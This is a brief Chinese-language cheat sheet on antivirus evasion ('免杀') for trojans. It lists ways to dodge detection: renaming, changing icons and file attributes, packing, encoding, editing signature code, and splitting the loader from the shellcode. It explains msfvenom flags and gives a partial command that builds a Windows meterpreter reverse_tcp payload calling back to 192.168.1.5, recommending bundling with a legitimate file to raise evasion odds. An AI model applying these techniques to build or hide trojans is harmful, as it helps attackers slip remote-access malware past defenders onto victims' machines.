免杀

免杀基础

1.初步木马免杀可能要更改进程名称,图标,文件名称,文件属性,加壳,生成木马时使用编码

修改源码的特征码;对shellcode二次编译;免杀生成器;加载器和shellcode分离,

msfvenom免杀

常用命令:

x86 or x 64

-a : 指定位数 x

-p ：指定payload模块 -l：列出可用项

-f：指定文件类型 -e：加载编码器

-b：-bad-chars 删除无效字符 -i：-iterations指定编码次数

-x：捆绑文件 -o：导出文件

一般来说捆绑文件的免杀机率会大一些

msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport= 

 

源码免杀

源码免杀基于特征码的一种免杀方式,定位源码中的特征代码进行修改就可以达到免杀效果:

定位特征码分为三种 1.定位到代码 2 定位到字符串 3 定位到输出表

攻击vs2012依赖文件 visual c++ mfc for and64

https://aka.ms/vs/16/release/vc_redist.x64.exe

杀软的疑似检测方向

1. 图标 2.关键字检测 3.配置文件的版本信息等(其实也是关键字)